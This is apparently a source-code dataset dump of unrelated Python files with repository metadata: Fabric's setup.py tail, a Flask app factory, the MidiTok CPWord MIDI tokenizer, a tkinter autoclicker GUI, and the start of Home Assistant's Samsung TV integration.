description='Fabric is a simple, Pythonic tool for remote execution and deployment.',
long_description=long_description,
author='Jeff Forcier',
author_email='jeff@bitprophet.org',
url='http://fabfile.org',
packages=find_packages(),
test_suite='nose.collector',
tests_require=['nose', 'fudge'],
install_requires=['pycrypto %s' % PYCRYPTO, 'paramiko >=1.7.6'],
entry_points={
'console_scripts': [
'fab = fabric.main:main',
]
},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: BSD License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Unix',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Topic :: Software Development',
'Topic :: Software Development :: Build Tools',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Clustering',
'Topic :: System :: Software Distribution',
'Topic :: System :: Systems Administration',
],
)
| 31.897059
| 89
| 0.61964
|
794fee9830aaeacb45de64c0f4e2bc6d205b5345
| 750
|
py
|
Python
|
flask/code/P9.FlaskMarshalling/app.py
|
santiagovj22/python-training
|
3fbcc9e5df22432c6e75d80c90d1c235652354df
|
[
"MIT"
] | null | null | null |
flask/code/P9.FlaskMarshalling/app.py
|
santiagovj22/python-training
|
3fbcc9e5df22432c6e75d80c90d1c235652354df
|
[
"MIT"
] | null | null | null |
flask/code/P9.FlaskMarshalling/app.py
|
santiagovj22/python-training
|
3fbcc9e5df22432c6e75d80c90d1c235652354df
|
[
"MIT"
] | null | null | null |
#Example 9
import logging
from flask import Flask
from flask_restx import Api
from controllers.games_controller import init_games_controller
def get_app(name, configuration):
app = Flask(name)
#Configure logger
#LOG_FILENAME = './logs/app.log'
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s %(name)s %(threadName)s : %(message)s')
app.logger.debug('Starting API Server')
app.config['MONGO_URI'] = configuration['MONGO_URI']
api = Api(app, validate=True)
init_games_controller(app, api)
return app
if __name__ == '__main__':
print('start')
get_app(__name__, {'MONGO_URI' :'mongodb://flask:flaskpwd@localhost:27017/gamestore?authSource=gamestore'}).run(debug=False)
| 25
| 128
| 0.714667
|
794fef1245b0fa8f8e1d34ec8c93254cbbe02367
| 22,867
|
py
|
Python
|
miditok/cp_word.py
|
ilya16/MidiTok
|
03d80fadbdf5bbe7802d97f7424638cff96e1a2b
|
[
"MIT"
] | null | null | null |
miditok/cp_word.py
|
ilya16/MidiTok
|
03d80fadbdf5bbe7802d97f7424638cff96e1a2b
|
[
"MIT"
] | null | null | null |
miditok/cp_word.py
|
ilya16/MidiTok
|
03d80fadbdf5bbe7802d97f7424638cff96e1a2b
|
[
"MIT"
] | null | null | null |
""" MIDI encoding method, similar to Compound Word
https://arxiv.org/abs/2101.02402
"""
from typing import List, Tuple, Dict, Optional, Union
import numpy as np
from miditoolkit import Instrument, Note, TempoChange
from .midi_tokenizer_base import MIDITokenizer, Vocabulary, Event, detect_chords
from .constants import *
class CPWord(MIDITokenizer):
""" MIDI encoding method, similar to Compound Word
https://arxiv.org/abs/2101.02402
Each compound token will be a list of the form:
(index. Token type)
0. Family
1. Bar/Position
2. Pitch
3. Velocity
4. Duration
(5. Program) optional, associated with notes (pitch/velocity/duration) or chords
(6. Chord) optional, chords occurring with position tokens
(7. Rest) optional, rest acting as a time-shift token
(8. Tempo) optional, occurring with position tokens
This means a "compound token" can contain between 5 and 7 elements depending on
your encoding parameters (additional tokens).
(the choice of using indexes instead of dictionary with keys is to reduce the memory
and storage usage for saved token files)
:param pitch_range: range of used MIDI pitches
:param beat_res: beat resolutions, with the form:
{(beat_x1, beat_x2): beat_res_1, (beat_x2, beat_x3): beat_res_2, ...}
The keys of the dict are tuples indicating a range of beats, ex 0 to 3 for the first bar
The values are the resolution, in samples per beat, of the given range, ex 8
:param nb_velocities: number of velocity bins
:param additional_tokens: specifies additional tokens (chords, time signature, rests, tempo...)
:param sos_eos_tokens: adds Start Of Sequence (SOS) and End Of Sequence (EOS) tokens to the vocabulary
:param mask: will add a MASK token to the vocabulary (default: False)
:param params: can be a path to the parameter (json encoded) file or a dictionary
"""
def __init__(self, pitch_range: range = PITCH_RANGE, beat_res: Dict[Tuple[int, int], int] = BEAT_RES,
nb_velocities: int = NB_VELOCITIES, additional_tokens: Dict[str, bool] = ADDITIONAL_TOKENS,
sos_eos_tokens: bool = False, mask: bool = False, params=None):
# Indexes of additional token types within a compound token
add_idx = 5
self.program_ixd = self.chord_idx = self.rest_idx = self.tempo_idx = None
if additional_tokens['Program']:
self.program_ixd = add_idx
add_idx += 1
if additional_tokens['Chord']:
self.chord_idx = add_idx
add_idx += 1
if additional_tokens['Rest']:
self.rest_idx = add_idx
add_idx += 1
if additional_tokens['Tempo']:
self.tempo_idx = add_idx
super().__init__(pitch_range, beat_res, nb_velocities, additional_tokens, sos_eos_tokens, mask, params)
def track_to_tokens(self, track: Instrument) -> List[List[int]]:
""" Converts a track (miditoolkit.Instrument object) into a sequence of tokens
:param track: MIDI track to convert
:return: sequence of corresponding tokens
"""
# Make sure the notes are sorted first by their onset (start) times, second by pitch
# notes.sort(key=lambda x: (x.start, x.pitch)) # done in midi_to_tokens
ticks_per_sample = self.current_midi_metadata['time_division'] / max(self.beat_res.values())
ticks_per_bar = self.current_midi_metadata['time_division'] * 4
dur_bins = self.durations_ticks[self.current_midi_metadata['time_division']]
min_rest = self.current_midi_metadata['time_division'] * self.rests[0][0] + ticks_per_sample * self.rests[0][1]\
if self.additional_tokens['Rest'] else 0
tokens = [] # list of lists of tokens
# Creates tokens
previous_tick = -1
previous_note_end = track.notes[0].start + 1 # so that no rest is created before the first note
current_bar = -1
current_tempo_idx = 0
current_tempo = self.current_midi_metadata['tempo_changes'][current_tempo_idx].tempo
for note in track.notes:
# Bar / Position / (Tempo) / (Rest)
if note.start != previous_tick:
# (Rest)
if self.additional_tokens['Rest'] and note.start > previous_note_end and \
note.start - previous_note_end >= min_rest:
previous_tick = previous_note_end
rest_beat, rest_pos = divmod(note.start - previous_tick,
self.current_midi_metadata['time_division'])
rest_beat = min(rest_beat, max([r[0] for r in self.rests]))
rest_pos = round(rest_pos / ticks_per_sample)
if rest_beat > 0:
tokens.append(self.create_cp_token(previous_note_end, rest=f'{rest_beat}.0', desc='Rest'))
previous_tick += rest_beat * self.current_midi_metadata['time_division']
while rest_pos >= self.rests[0][1]:
rest_pos_temp = min([r[1] for r in self.rests], key=lambda x: abs(x - rest_pos))
tokens.append(self.create_cp_token(previous_note_end, rest=f'0.{rest_pos_temp}', desc='Rest'))
previous_tick += round(rest_pos_temp * ticks_per_sample)
rest_pos -= rest_pos_temp
current_bar = previous_tick // ticks_per_bar
# (Tempo)
if self.additional_tokens['Tempo']:
# If the current tempo is not the last one
if current_tempo_idx + 1 < len(self.current_midi_metadata['tempo_changes']):
# Will loop over incoming tempo changes
for tempo_change in self.current_midi_metadata['tempo_changes'][current_tempo_idx + 1:]:
# If this tempo change happened before the current moment
if tempo_change.time <= note.start:
current_tempo = tempo_change.tempo
current_tempo_idx += 1 # update tempo value (might not change) and index
elif tempo_change.time > note.start:
break # this tempo change is beyond the current time step, we break the loop
# Bar
nb_new_bars = note.start // ticks_per_bar - current_bar
for i in range(nb_new_bars):
tokens.append(self.create_cp_token((current_bar + i + 1) * ticks_per_bar, bar=True, desc='Bar'))
current_bar += nb_new_bars
# Position
pos_index = int((note.start % ticks_per_bar) / ticks_per_sample)
tokens.append(self.create_cp_token(int(note.start), pos=pos_index,
tempo=current_tempo if self.additional_tokens['Tempo'] else None,
desc='Position'))
previous_tick = note.start
# Note
duration = note.end - note.start
dur_index = np.argmin(np.abs(dur_bins - duration))
dur_value = '.'.join(map(str, self.durations[dur_index]))
tokens.append(self.create_cp_token(int(note.start), pitch=note.pitch, vel=note.velocity, dur=dur_value,
desc=f'{duration} ticks'))
previous_note_end = max(previous_note_end, note.end)
tokens.sort(key=lambda x: x[0].time)
# Adds chord tokens if specified
if self.additional_tokens['Chord'] and not track.is_drum:
chord_events = detect_chords(track.notes, self.current_midi_metadata['time_division'], self._first_beat_res)
count = 0
for chord_event in chord_events:
for e, cp_token in enumerate(tokens[count:]):
if cp_token[0].time == chord_event.time and cp_token[0].desc == 'Position':
cp_token[self.chord_idx] = \
self.vocab[self.chord_idx].event_to_token[f'Chord_{chord_event.value}']
count = e
break
# Convert the first element of each compound token from Event to int
for cp_token in tokens:
cp_token[0] = self.vocab[0].event_to_token[f'Family_{cp_token[0].value}']
return tokens
def create_cp_token(self, time: int, bar: bool = False, pos: int = None, pitch: int = None, vel: int = None,
dur: str = None, chord: str = None, rest: str = None, tempo: int = None, program: int = None,
desc: str = '') -> List[Union[Event, int]]:
""" Create a CP Word token, with the following structure:
(index. Token type)
0. Family
1. Bar/Position
2. Pitch
3. Velocity
4. Duration
(5. Program) optional, associated with notes (pitch/velocity/duration) or chords
(6. Chord) optional, chords occurring with position tokens
(7. Rest) optional, rest acting as a time-shift token
(8. Tempo) optional, occurring with position tokens
NOTE: the first Family token (first in list) will be given as an Event object to keep track
of time easily so that other method can sort CP tokens afterwards.
:param time: the current tick
:param bar: True if this token represents a new bar occurring
:param pos: the position index
:param pitch: note pitch
:param vel: note velocity
:param dur: note duration
:param chord: chord value
:param rest: rest value
:param tempo: tempo index
:param program: a program number if you want to produce a Program CP token (read note above)
:param desc: an optional argument for debug and used to spot position tokens in track_to_tokens
:return: The compound token as a list of integers
"""
cp_token_template = [Event(type_='Family', time=time, value='Metric', desc=desc),
self.vocab[1].event_to_token['Position_Ignore'],
self.vocab[2].event_to_token['Pitch_Ignore'],
self.vocab[3].event_to_token['Velocity_Ignore'],
self.vocab[4].event_to_token['Duration_Ignore']]
if self.additional_tokens['Program']:
cp_token_template.append(self.vocab[self.program_ixd].event_to_token['Program_Ignore'])
if self.additional_tokens['Chord']:
cp_token_template.append(self.vocab[self.chord_idx].event_to_token['Chord_Ignore'])
if self.additional_tokens['Rest']:
cp_token_template.append(self.vocab[self.rest_idx].event_to_token['Rest_Ignore'])
if self.additional_tokens['Tempo']:
cp_token_template.append(self.vocab[self.tempo_idx].event_to_token['Tempo_Ignore'])
if bar:
cp_token_template[1] = self.vocab[1].event_to_token['Bar_None']
elif pos is not None:
cp_token_template[1] = self.vocab[1].event_to_token[f'Position_{pos}']
if chord is not None:
cp_token_template[self.chord_idx] = self.vocab[self.chord_idx].event_to_token[f'Chord_{chord}']
if tempo is not None:
cp_token_template[self.tempo_idx] = self.vocab[self.tempo_idx].event_to_token[f'Tempo_{tempo}']
elif rest is not None:
cp_token_template[self.rest_idx] = self.vocab[self.rest_idx].event_to_token[f'Rest_{rest}']
elif pitch is not None:
cp_token_template[0].value = 'Note'
cp_token_template[2] = self.vocab[2].event_to_token[f'Pitch_{pitch}']
cp_token_template[3] = self.vocab[3].event_to_token[f'Velocity_{vel}']
cp_token_template[4] = self.vocab[4].event_to_token[f'Duration_{dur}']
if program is not None:
cp_token_template[self.program_ixd] = \
self.vocab[self.program_ixd].event_to_token[f'Program_{program}']
return cp_token_template
def tokens_to_track(self, tokens: List[List[int]], time_division: Optional[int] = TIME_DIVISION,
program: Optional[Tuple[int, bool]] = (0, False)) -> Tuple[Instrument, List[TempoChange]]:
""" Converts a sequence of tokens into a track object
:param tokens: sequence of tokens to convert
:param time_division: MIDI time division / resolution, in ticks/beat (of the MIDI to create)
:param program: the MIDI program of the produced track and if it drum, (default (0, False), piano)
:return: the miditoolkit instrument object and tempo changes
"""
assert time_division % max(self.beat_res.values()) == 0,\
f'Invalid time division, please give one divisible by {max(self.beat_res.values())}'
events = self.tokens_to_events(tokens, multi_voc=True)
ticks_per_sample = time_division // max(self.beat_res.values())
ticks_per_bar = time_division * 4
name = 'Drums' if program[1] else MIDI_INSTRUMENTS[program[0]]['name']
instrument = Instrument(program[0], is_drum=program[1], name=name)
tempo_changes = [TempoChange(TEMPO, -1)] # mock the first tempo change to optimize below
current_tick = 0
current_bar = -1
previous_note_end = 0
for compound_token in events:
token_family = compound_token[0].value
if token_family == 'Note':
if any(tok.value == 'None' for tok in compound_token[1:5]):
continue
pitch = int(compound_token[2].value)
vel = int(compound_token[3].value)
duration = self._token_duration_to_ticks(compound_token[4].value, time_division)
instrument.notes.append(Note(vel, pitch, current_tick, current_tick + duration))
previous_note_end = max(previous_note_end, current_tick + duration)
elif token_family == 'Metric':
if compound_token[1].type == 'Bar':
current_bar += 1
current_tick = current_bar * ticks_per_bar
elif compound_token[1].value != 'Ignore': # i.e. its a position
if current_bar == -1:
current_bar = 0 # as this Position token occurs before any Bar token
current_tick = current_bar * ticks_per_bar + int(compound_token[1].value) * ticks_per_sample
if self.additional_tokens['Tempo']:
tempo = int(compound_token[-1].value)
if tempo != tempo_changes[-1].tempo:
tempo_changes.append(TempoChange(tempo, current_tick))
elif compound_token[self.rest_idx].value != 'Ignore': # i.e. its a rest
if current_tick < previous_note_end: # if in case successive rest happen
current_tick = previous_note_end
beat, pos = map(int, compound_token[self.rest_idx].value.split('.'))
current_tick += beat * time_division + pos * ticks_per_sample
current_bar = current_tick // ticks_per_bar
if len(tempo_changes) > 1:
del tempo_changes[0]
tempo_changes[0].time = 0
return instrument, tempo_changes
def _create_vocabulary(self, sos_eos_tokens: bool = None) -> List[Vocabulary]:
""" Creates the Vocabulary object of the tokenizer.
See the docstring of the Vocabulary class for more details about how to use it.
        :param sos_eos_tokens: DEPRECATED, will include Start Of Sequence (SOS) and End Of Sequence (EOS) tokens
:return: the vocabulary object
"""
if sos_eos_tokens is not None:
            print(f'\033[93msos_eos_tokens argument is deprecated and will be removed in a future update, '
                  f'_create_vocabulary now uses the self._sos_eos attribute set at class init \033[0m')
vocab = [Vocabulary({'PAD_None': 0}, sos_eos=self._sos_eos, mask=self._mask) for _ in range(5)]
vocab[0].add_event('Family_Metric')
vocab[0].add_event('Family_Note')
# POSITION
nb_positions = max(self.beat_res.values()) * 4 # 4/* time signature
vocab[1].add_event('Position_Ignore')
vocab[1].add_event('Bar_None')
vocab[1].add_event(f'Position_{i}' for i in range(nb_positions))
# PITCH
vocab[2].add_event('Pitch_Ignore')
vocab[2].add_event(f'Pitch_{i}' for i in self.pitch_range)
# VELOCITY
vocab[3].add_event('Velocity_Ignore')
vocab[3].add_event(f'Velocity_{i}' for i in self.velocities)
# DURATION
vocab[4].add_event('Duration_Ignore')
vocab[4].add_event(f'Duration_{".".join(map(str, duration))}' for duration in self.durations)
# PROGRAM
if self.additional_tokens['Program']:
vocab.append(Vocabulary({'PAD_None': 0}, sos_eos=self._sos_eos, mask=self._mask))
vocab[-1].add_event('Program_Ignore')
vocab[-1].add_event(f'Program_{program}' for program in range(-1, 128))
# CHORD
if self.additional_tokens['Chord']:
vocab.append(Vocabulary({'PAD_None': 0}, sos_eos=self._sos_eos, mask=self._mask))
vocab[-1].add_event('Chord_Ignore')
vocab[-1].add_event(f'Chord_{i}' for i in range(3, 6)) # non recognized chords (between 3 and 5 notes)
vocab[-1].add_event(f'Chord_{chord_quality}' for chord_quality in CHORD_MAPS)
# REST
if self.additional_tokens['Rest']:
vocab.append(Vocabulary({'PAD_None': 0}, sos_eos=self._sos_eos, mask=self._mask))
vocab[-1].add_event('Rest_Ignore')
vocab[-1].add_event(f'Rest_{".".join(map(str, rest))}' for rest in self.rests)
# TEMPO
if self.additional_tokens['Tempo']:
vocab.append(Vocabulary({'PAD_None': 0}, sos_eos=self._sos_eos, mask=self._mask))
vocab[-1].add_event('Tempo_Ignore')
vocab[-1].add_event(f'Tempo_{i}' for i in self.tempos)
return vocab
def _create_token_types_graph(self) -> Dict[str, List[str]]:
""" Returns a graph (as a dictionary) of the possible token
types successions.
As with CP the tokens types are "merged", each state here corresponds to
a "compound" token, which is characterized by the token types Program, Bar,
Position/Chord/Tempo and Pitch/Velocity/Duration
Here the combination of Pitch, Velocity and Duration tokens is represented by
"Pitch" in the graph.
NOTE: Program type is not referenced here, you can add it manually by
modifying the tokens_types_graph class attribute following your strategy.
:return: the token types transitions dictionary
"""
dic = dict()
dic['Bar'] = ['Position', 'Bar']
dic['Position'] = ['Pitch']
dic['Pitch'] = ['Pitch', 'Bar', 'Position']
if self.additional_tokens['Chord']:
dic['Rest'] = ['Rest', 'Position']
dic['Pitch'] += ['Rest']
if self.additional_tokens['Rest']:
dic['Rest'] = ['Rest', 'Position', 'Bar']
dic['Pitch'] += ['Rest']
self._add_pad_type_to_graph(dic)
return dic
def token_types_errors(self, tokens: List[List[int]], consider_pad: bool = False) -> float:
""" Checks if a sequence of tokens is constituted of good token types
successions and returns the error ratio (lower is better).
The Pitch and Position values are also analyzed:
- a position token cannot have a value <= to the current position (it would go back in time)
- a pitch token should not be present if the same pitch is already played at the current position
:param tokens: sequence of tokens to check
:param consider_pad: if True will continue the error detection after the first PAD token (default: False)
:return: the error ratio (lower is better)
"""
def cp_token_type(tok: List[int]) -> Tuple[str, str]:
family = self.vocab[0].token_to_event[tok[0]].split('_')[1]
if family == 'Note':
return self.vocab[2].token_to_event[tok[2]].split('_')
elif family == 'Metric':
bar_pos = self.vocab[1].token_to_event[tok[1]].split('_')
if bar_pos[1] != 'Ignore':
return bar_pos
else: # additional token
for i in range(1, 5):
decoded_token = self.vocab[-i].token_to_event[tok[-i]].split('_')
if decoded_token[1] != 'Ignore':
return decoded_token
raise RuntimeError('No token type found, unknown error')
elif family == 'None':
return 'PAD', 'None'
else: # Program
raise RuntimeError('No token type found, unknown error')
err = 0
previous_type = cp_token_type(tokens[0])[0]
current_pos = -1
current_pitches = []
def check(tok: List[int]):
nonlocal err, previous_type, current_pos, current_pitches
token_type, token_value = cp_token_type(tok)
# Good token type
if token_type in self.tokens_types_graph[previous_type]:
if token_type == 'Bar': # reset
current_pos = -1
current_pitches = []
elif token_type == 'Pitch':
if int(token_value) in current_pitches:
err += 1 # pitch already played at current position
else:
current_pitches.append(int(token_value))
elif token_type == 'Position':
if int(token_value) <= current_pos and previous_type != 'Rest':
err += 1 # token position value <= to the current position
else:
current_pos = int(token_value)
current_pitches = []
# Bad token type
else:
err += 1
previous_type = token_type
if consider_pad:
for token in tokens[1:]:
check(token)
else:
for token in tokens[1:]:
if previous_type == 'PAD':
break
check(token)
return err / len(tokens)
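# Minimal usage sketch (not part of the original module), assuming miditoolkit
# is installed, that 'example.mid' exists, and that midi_to_tokens() is the
# base-class entry point for converting a whole MIDI file into token sequences.
if __name__ == '__main__':
    from miditoolkit import MidiFile

    tokenizer = CPWord(pitch_range=range(21, 109),
                       beat_res={(0, 4): 8, (4, 12): 4},
                       nb_velocities=32)
    midi = MidiFile('example.mid')  # hypothetical input file
    tokens = tokenizer.midi_to_tokens(midi)  # one list of compound tokens per track
    print('%d compound tokens in the first track' % len(tokens[0]))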
| 51.61851
| 120
| 0.599729
|
794fef505fbd8acc556f458e74026b744391c9bc
| 10,506
|
py
|
Python
|
GUI.py
|
Archie-Dev-main/AutoClicker
|
cb3b496abfba9a98737d615f0f761899d50f88f4
|
[
"MIT"
] | null | null | null |
GUI.py
|
Archie-Dev-main/AutoClicker
|
cb3b496abfba9a98737d615f0f761899d50f88f4
|
[
"MIT"
] | null | null | null |
GUI.py
|
Archie-Dev-main/AutoClicker
|
cb3b496abfba9a98737d615f0f761899d50f88f4
|
[
"MIT"
] | null | null | null |
# Uses the installer class to check for and install missing modules
import installer
install = installer.Installer()
install.install_required_modules()
import tkinter as tk
import mouse
import time
from sys import maxsize
import ExitSplash as ES
# The main housing for both the GUI and the entire program
class GUI(tk.Frame):
# Contains all instance variables used throughout the GUI
def __init__(self, master=None):
super().__init__(master)
        # The x coordinate for the Desired Position
self.x = tk.IntVar()
self.x.set(0)
        # The y coordinate for the Desired Position
self.y = tk.IntVar()
self.y.set(0)
# Used to determine if the user wants the clicker to run indefinitely
self.infinite = tk.IntVar()
self.infinite.set(0)
        # Used to determine if the user wants the clicker to double click with every click it performs
self.doubleVar = tk.IntVar()
self.doubleVar.set(0)
# Used to determine the length of time in seconds the user wants to run the clicker if they do not select infinite
self.lengthVar = tk.IntVar()
self.lengthVar.set(0)
# Used to determine the amount of delay in milliseconds between clicks the user wants
self.delayVar = tk.IntVar()
self.delayVar.set(0)
# Used for displaying the current position of the mouse on a label
self.mousePosVar = tk.StringVar()
self.mousePosVar.set("Current Mouse Position "+str(mouse.get_position()))
# Used to determine which button the mouse uses when the clicker runs
self.mouseButtonVar = tk.StringVar()
self.mouseButtonVar.set("Left")
# The options for buttons on the mouse the user has
self.mouseButtonOptions = ["Left", "Middle", "Right"]
# Used for emergency stops when the clicker is running
self.stopClickingVar = False
# Used to update the timer label
self.timerVar = tk.StringVar()
self.timerVar.set("Time left: " + str(0.0))
self.master = master
self.pack()
self.create_widgets()
self.displayCurrentMousePos()
# Used as a button command to send the mouse to the Desired Location
def sendMouse(self):
mouse.move(self.x.get(), self.y.get())
    # Used to call the mouse.move function and begin the loop that clicks the mouse with the desired settings; it also handles the timer and updating the timer display
def startSendClicking(self, start, firstRun=True):
        # A local variable that keeps the IntVar backing the length entry untouched, so that infinite mode can run without displaying sys.maxsize
trueLength = self.lengthVar.get()
        # Used to store whether the user chose to run the clicker indefinitely or not
infinite = bool(self.infinite.get())
# Used to assign the mouse type for clicking
mouse_type = mouse.LEFT
# Used to determine whether normal or double clicks are used
click_type = bool(self.doubleVar.get())
# The current time
current = time.time()
# The time that has passed since the loop started
elapsed = current - start
        # Uses the param to send the mouse to the desired location when the loop runs for the first time; this is done to keep the mouse unlocked
if firstRun:
self.sendMouse()
        # Allows the loop to run indefinitely but with an escape determined by the user
if infinite and not self.stopClickingVar:
trueLength = maxsize
else:
trueLength = self.lengthVar.get()
self.stopClickingVar = False
# Sets which mouse button is used in the auto clicker class function
if self.mouseButtonVar.get() == "Left":
mouse_type = mouse.LEFT
elif self.mouseButtonVar.get() == "Middle":
mouse_type = mouse.MIDDLE
else:
mouse_type = mouse.RIGHT
# A call to the autoclicker class function
if click_type:
mouse.double_click(mouse_type)
else:
mouse.click(mouse_type)
        # The recursive part of the loop; it contains a failsafe so that the clicker stops if the user moves the mouse more than ten pixels away from the desired position in any direction
        if elapsed <= trueLength and abs(mouse.get_position()[0] - self.x.get()) <= 10 and abs(mouse.get_position()[1] - self.y.get()) <= 10:
if self.delayVar.get() > 0:
self.timerVar.set("Time left: " + str(round(self.lengthVar.get() - elapsed, 1)))
self.after(self.delayVar.get(), self.startSendClicking, start, False)
else:
self.after_idle(self.startSendClicking, start, False)
else:
self.timerVar.set("Time left: " + str(0.0))
    # Sets the desired position to the current mouse position
def getCurrentMousePos(self, event=' '):
self.x.set(mouse.get_position()[0])
self.y.set(mouse.get_position()[1])
# Recursively displays the current mouse position
def displayCurrentMousePos(self):
self.mousePosVar.set("Current Mouse Position "+str(mouse.get_position()))
self.after(1, self.displayCurrentMousePos)
# Forces the clicker to stop with a keyboard button press
def stopClicking(self, event=' '):
self.stopClickingVar = True
self.lengthVar.set(0)
# The emergency quit for the clicker, skips the exit splash
def quitClicker(self, event=' '):
quit()
# Creates all of the widgets used in the GUI
def create_widgets(self):
# A label to mark the purpose of the associated entries below for the user
self.setPosLabel = tk.Label(self, text="Desired Position(X,Y)")
self.setPosLabel.grid(row=0, column=0, sticky=tk.N, padx=5, pady=5)
# An entry for the user to set the x coordinate for the desired position
self.setXEntry = tk.Entry(self, textvariable=self.x, justify=tk.RIGHT)
self.setXEntry.grid(row=0, column=1, sticky=tk.N, padx=5, pady=5)
# An entry for the user to set the y coordinate for the desired position
self.setYEntry = tk.Entry(self, textvariable=self.y, justify=tk.RIGHT)
self.setYEntry.grid(row=0, column=2, sticky=tk.N, padx=5, pady=5)
# A button for the user to test mouse coordinates by sending the mouse to the coordinates
self.sendMouseButton = tk.Button(self, text="Send Mouse", command=self.sendMouse)
self.sendMouseButton.grid(row=0, column=3, sticky=tk.N, padx=5, pady=5)
# The checkbox that allows the user to make the clicker run indefinitely
self.infiniteCheckButton = tk.Checkbutton(self, text="Infinite", variable=self.infinite, onvalue=1, offvalue=0)
self.infiniteCheckButton.grid(row=1, column=0, sticky=tk.W, padx=5, pady=5)
        # The checkbox that allows the user to select whether the clicker performs normal or double clicks
        self.doubleCheckButton = tk.Checkbutton(self, text="Double", variable=self.doubleVar, onvalue=1, offvalue=0)
        self.doubleCheckButton.grid(row=1, column=1, sticky=tk.W, padx=5, pady=5)
# A label to mark the purpose of the following entry for the user
self.lengthLabel = tk.Label(self, text="Length(s)")
self.lengthLabel.grid(row=2, column=0, sticky=tk.S, padx=5, pady=5)
# An entry for the user to set the length the program runs for
self.lengthEntry = tk.Entry(self, textvariable=self.lengthVar, justify=tk.RIGHT)
self.lengthEntry.grid(row=2, column=1, sticky=tk.S, padx=5, pady=5)
# A label that displays the current timer length
self.timerLabel = tk.Label(self, textvariable=self.timerVar)
self.timerLabel.grid(row=2, column=2, sticky=tk.S, padx=5, pady=5)
# A label to mark the purpose of the following entry for the user
self.delayLabel = tk.Label(self, text="Delay(ms)")
self.delayLabel.grid(row=3, column=0, sticky=tk.S, padx=5, pady=5)
        # An entry for the user to set the delay the clicker uses between clicks
self.delayEntry = tk.Entry(self, textvariable=self.delayVar, justify=tk.RIGHT)
self.delayEntry.grid(row=3, column=1, sticky=tk.S, padx=5, pady=5)
# A drop down menu for the user to select which mouse button is used in the clicker
self.mouseButtonOptionMenu = tk.OptionMenu(self, self.mouseButtonVar, *self.mouseButtonOptions)
self.mouseButtonOptionMenu.grid(row=4, column=2, sticky=tk.E, padx=5, pady=5)
# A button for the user to begin the clicker
self.sendStartButton = tk.Button(self, text="Send & Start Clicking", command=lambda: self.startSendClicking(time.time()))
self.sendStartButton.grid(row=4, column=3, sticky=tk.E, padx=5, pady=5)
# A label that tells the user what the current position of their mouse is
self.currentPosLabel = tk.Label(self, textvariable=self.mousePosVar)
self.currentPosLabel.grid(row=5, column=0, sticky=tk.W, padx=5, pady=5)
# A button that, while it works, exists only to tell the user that the control key is used to set the current mouse position as the desired one
        self.getCurrentPosButton = tk.Button(self, text="Set Desired Position as Current Position (Press CTRL)", command=self.getCurrentMousePos)
self.getCurrentPosButton.grid(row=6, column=0, sticky=tk.W, padx=5, pady=5)
# The run code for the GUI: it changes the window title and icon, binds all keyboard controls, and starts the display updating loop
root = tk.Tk()
gui = GUI(master=root)
gui.master.title("AutoClicker")
gui.master.iconbitmap("icon.ico")
gui.master.bind('<Control_L>', gui.getCurrentMousePos)
gui.master.bind('<Escape>', gui.stopClicking)
gui.master.bind('<Shift-Escape>', gui.quitClicker)
gui.master.bind('<Return>', gui.startSendClicking)
gui.master.lift()
gui.master.attributes("-topmost", True)
gui.mainloop()
# The run code for the exit splash: it changes the window title and icon, and keeps the splash up for 3 seconds
exitroot = tk.Tk()
exitsplash = ES.ExitSplash(master=exitroot)
exitsplash.master.title("Exit Splash")
exitsplash.master.iconbitmap("icon.ico")
exitsplash.after(3000, exitroot.destroy)
exitsplash.mainloop()
| 47.538462
| 241
| 0.673996
|
794fefbf21ced9a4d0f8221df4f08d6118034226
| 54
|
py
|
Python
|
main.py
|
RafaelFreita/hcpa-image-processing
|
480858eb7a486bce74dc8b74cfd04ebcf5059b83
|
[
"MIT"
] | null | null | null |
main.py
|
RafaelFreita/hcpa-image-processing
|
480858eb7a486bce74dc8b74cfd04ebcf5059b83
|
[
"MIT"
] | null | null | null |
main.py
|
RafaelFreita/hcpa-image-processing
|
480858eb7a486bce74dc8b74cfd04ebcf5059b83
|
[
"MIT"
] | null | null | null |
from hcpa_biomed_processing import execute
execute()
| 13.5
| 42
| 0.851852
|
794fefffeccf062660906113be0cd3acf27e7981
| 6,685
|
py
|
Python
|
homeassistant/components/media_player/samsungtv.py
|
loraxx753/skynet
|
86a1b0a6c6a3f81bc92d4f61de6a9a6b9f964543
|
[
"Apache-2.0"
] | null | null | null |
homeassistant/components/media_player/samsungtv.py
|
loraxx753/skynet
|
86a1b0a6c6a3f81bc92d4f61de6a9a6b9f964543
|
[
"Apache-2.0"
] | null | null | null |
homeassistant/components/media_player/samsungtv.py
|
loraxx753/skynet
|
86a1b0a6c6a3f81bc92d4f61de6a9a6b9f964543
|
[
"Apache-2.0"
] | 1
|
2019-08-04T19:25:10.000Z
|
2019-08-04T19:25:10.000Z
|
"""
Support for interfacing with a Samsung TV.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/media_player.samsungtv/
"""
import logging
import socket
import voluptuous as vol
from homeassistant.components.media_player import (
SUPPORT_NEXT_TRACK, SUPPORT_PAUSE, SUPPORT_PREVIOUS_TRACK,
SUPPORT_TURN_OFF, SUPPORT_VOLUME_MUTE, SUPPORT_VOLUME_STEP,
SUPPORT_PLAY, MediaPlayerDevice, PLATFORM_SCHEMA)
from homeassistant.const import (
CONF_HOST, CONF_NAME, STATE_OFF, STATE_ON, STATE_UNKNOWN, CONF_PORT)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['samsungctl==0.6.0']
_LOGGER = logging.getLogger(__name__)
CONF_TIMEOUT = 'timeout'
DEFAULT_NAME = 'Samsung TV Remote'
DEFAULT_PORT = 55000
DEFAULT_TIMEOUT = 0
KNOWN_DEVICES_KEY = 'samsungtv_known_devices'
SUPPORT_SAMSUNGTV = SUPPORT_PAUSE | SUPPORT_VOLUME_STEP | \
SUPPORT_VOLUME_MUTE | SUPPORT_PREVIOUS_TRACK | \
SUPPORT_NEXT_TRACK | SUPPORT_TURN_OFF | SUPPORT_PLAY
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
